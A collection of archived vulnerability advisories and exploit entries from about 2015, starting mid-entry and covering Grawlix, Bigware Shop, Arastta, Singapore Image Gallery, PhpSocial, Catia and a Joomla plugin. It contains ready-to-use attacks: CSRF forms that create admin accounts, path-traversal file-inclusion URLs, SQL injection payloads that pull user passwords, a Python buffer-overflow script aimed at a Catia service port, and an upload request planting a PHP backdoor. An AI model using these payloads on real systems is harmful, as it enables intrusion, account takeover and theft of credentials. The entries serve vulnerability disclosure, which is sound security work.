type="hidden" name="password[1]" value="admin" /> <input type="hidden" name="confirm_password[1]" value="admin" /> <input type="hidden" name="submit" value="save" /> <input type="submit" value="Submit request" /> </form> </body> </html> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Grawlix-103-CSRF-128.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany

# Title: Bigware Shop 2.3.01 Multiple Local File Inclusion Vulnerabilities # Author: bd0rk # eMail: bd0rk[at]hackermail.com # Twitter: twitter.com/bd0rk # Tested on: Ubuntu-Linux # Vendor: http://www.bigware.de # Download: http://www.bigware.de/download/bigware_software_-_vollversion/Bigware_Shop.zip Proof-of-Concept1: /Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php source-line 58 ********************************************************************** require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php'); ********************************************************************** [+]Sploit1: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../yourFILE.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof-of-Concept2: /Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php source-line 56 ********************************************************************* require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php'); ********************************************************************* [+]Sploit: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../yourFILE.php => Vuln-Description: The $language-parameter isn't declared. So an attacker can readin'. => Vendor-Solution: Please declare this parameter before require. ***Greetings fr0m Germany: zone-h.org-Team, exploit-db.com, GoLd_M, Kim Dotcom*** MERRY CHRISTMAS BRO'S! :)

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Arastta 1.1.5 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://arastta.org/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Arastta is an eCommerce software written in PHP. In version 1.1.5, it is vulnerable to two SQL injection vulnerabilities, one normal injection when searching for products via tags, and one blind injection via the language setting. Both of them require a user with special privileges to trigger. 3. SQL Injection 1 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description There is an SQL Injection when retrieving products. Currently, only the "filter" variable is vulnerable. Note that the "tag_name" variable would also be vulnerable to SQL injection, if there wasn't a filter that forbid single quotes in the URL. As defense in depth, it might be a good idea to sanitize that value here as well. Note that an account with the right "Catalog -> Filters" is needed to exploit this issue. Proof of Concept POST /Arastta/admin/index.php?route=catalog/product/autocomplete&token=3d6cfa8f9f602a4f47e0dfbdb989a469&filter_name=a&tag_name= HTTP/1.1 tag_text[][value]=abc') union all select password from gv4_user -- - Code /admin/model/catalog/product.php public function getTags($tag_name, $filter_tags = null) { [...] $query = $this->db->query("SELECT DISTINCT(tag) FROM `" . DB_PREFIX . "product_description` WHERE `tag` LIKE '%" . $tag_name . "%'" . $filter); /admin/controller/catalog/product.php public function autocomplete() { [...] if (isset($this->request->get['tag_name'])) { $this->load->model('catalog/product'); if (isset($this->request->get['tag_name'])) { $tag_name = $this->request->get['tag_name']; } else { $tag_name = ''; } $filter = null; if(isset($this->request->post['tag_text'])) { $filter = $this->request->post['tag_text']; } $results = $this->model_catalog_product->getTags($tag_name, $filter); foreach ($results as $result) { $json[] = array( 'tag' => $result, 'tag_id' => $result ); } } 4. SQL Injection 2 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description There is a second order timing based SQL injection when choosing the language setting. An admin account with the right "Setting -> Setting" is needed to exploit this issue. Alternatively, a user with the right "Localisation -> Languages" can inject a payload as well. However, a user with the right "Setting -> Setting" is still needed to choose the malicious language to trigger the payload. Proof of Concept Visit the setting page: http://localhost/Arastta/admin/index.php?route=setting/setting For the config_language and config_admin_language parameters use: en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) -- - Visiting any site will trigger the injected code. Code /Arastta/system/library/utility.php public function getDefaultLanguage(){ if (!is_object($this->config)) { return; } $store_id = $this->config->get('config_store_id'); if (Client::isAdmin()){ $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_admin_language' AND `store_id` = '" . $store_id . "'"; } else { $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_language' AND `store_id` = '" . $store_id . "'"; } $query = $this->db->query($sql); $code = $query->row['value']; $language = $this->db->query("SELECT * FROM " . DB_PREFIX . "language WHERE `code` = '" . $code . "'"); return $language->row; } 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/17/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Arastta-115-SQL-Injection-131.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany

source: https://www.securityfocus.com/bid/65420/info Singapore Image Gallery is prone to a remote file-include vulnerability and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information, execute arbitrary script code in the context of the web server process, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or steal cookie-based authentication credentials and launch other attacks. Singapore 0.9.9b and 0.9.10 are vulnerable; other versions may also be vulnerable. http://www.example.com/thumb.php?gallery=./00000000000-764&height=100&image=[File Upload]

Security Advisory - Curesec Research Team 1. Introduction Affected Product: PhpSocial v2.0.0304_20222226 Fixed in: not fixed Fixed Version Link: n/a Vendor Webite: http://phpsocial.net Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description PhpSocial is a social networking software written in PHP. In version v2.0.0304, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in. 3. Proof of Concept Add a new admin: <html> <body> <form action="http://localhost/PhpSocial_v2.0.0304_20222226/cms_phpsocial/admin/AdminAddViewadmins.php" method="POST"> <input type="hidden" name="admin_username" value="admin2" /> <input type="hidden" name="admin_password" value="admin" /> <input type="hidden" name="admin_password_confirm" value="admin" /> <input type="hidden" name="admin_name" value="admin2" /> <input type="hidden" name="admin_email" value="admin2@example.com" /> <input type="hidden" name="task" value="addadmin" /> <input type="submit" value="Submit request" /> </form> </body> </html> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/21/ Contacted Vendor (no reply) 2015 12/10/ Tried to remind vendor (no email is given, security@phpsocial.net does 2015 not exist, and contact form could not be used because the website is down) 12/21/ Disclosed to public 2015 Blog Reference: https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany

source: https://www.securityfocus.com/bid/65675/info Catia is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. Catia V5-6R2013 is vulnerable. #!/usr/bin/env python import socket import struct import ctypes RetAdd="\x90\x90\x90\x90" Shell="S" *1000 buff= "\x00\x01\x00\x30" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "\x00" * 48 + "CATV5_Backbone_Bus" +"\x00" + "\x00"* 49 + "\x00\x00\x00\x00" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.3", 55555)) #s.connect(("192.168.0.5", 55558)) s.send(struct.pack('>I',len(buff) )) s.send(buff) buff= "\x02\x00\x00\x00" + RetAdd*3 + "\x00\x00\x00\x00" * 13 + "\x00\x00\x00\x00" * 5 + "CATV5_AllApplications" +"\x00" + "\x00"* 43 +"\x00\x00\x98" + "\x00\x00\x00\x01" +"\x00"*4 +"\x08\x00\x00\x00" + Shell s.send(struct.pack('>I',len(buff) )) s.send(buff)

source: https://www.securityfocus.com/bid/65438/info Projoom NovaSFH plugin for Joomla! is prone to an arbitrary-file-upload vulnerability because it fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files; this can result in arbitrary code execution within the context of the vulnerable application. Projoom NovaSFH Plugin 3.0.2 is vulnerable; other versions may also be affected. POST /administrator/components/com_novasfh/views/upload.php?action=upload&dest=L3Zhci93d3cvaHRtbA== HTTP/1.1 Host: <IP> Proxy-Connection: keep-alive Content-Length: 513 Origin: <originl> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 Content-Type: multipart/form-data; boundary=----------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2 Accept: */* DNT: 1 Referer: http://<host>/administrator/index.php?option=com_novasfh&c=uploader Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 ------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2 Content-Disposition: form-data; name="Filename" php_backdoor.php ------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2 Content-Disposition: form-data; name="Filedata"; filename="php_backdoor3.php" Content-Type: application/octet-stream [PHP_CODE] ------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2 Content-Disposition: form-data; name="Upload" Submit Query ------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2--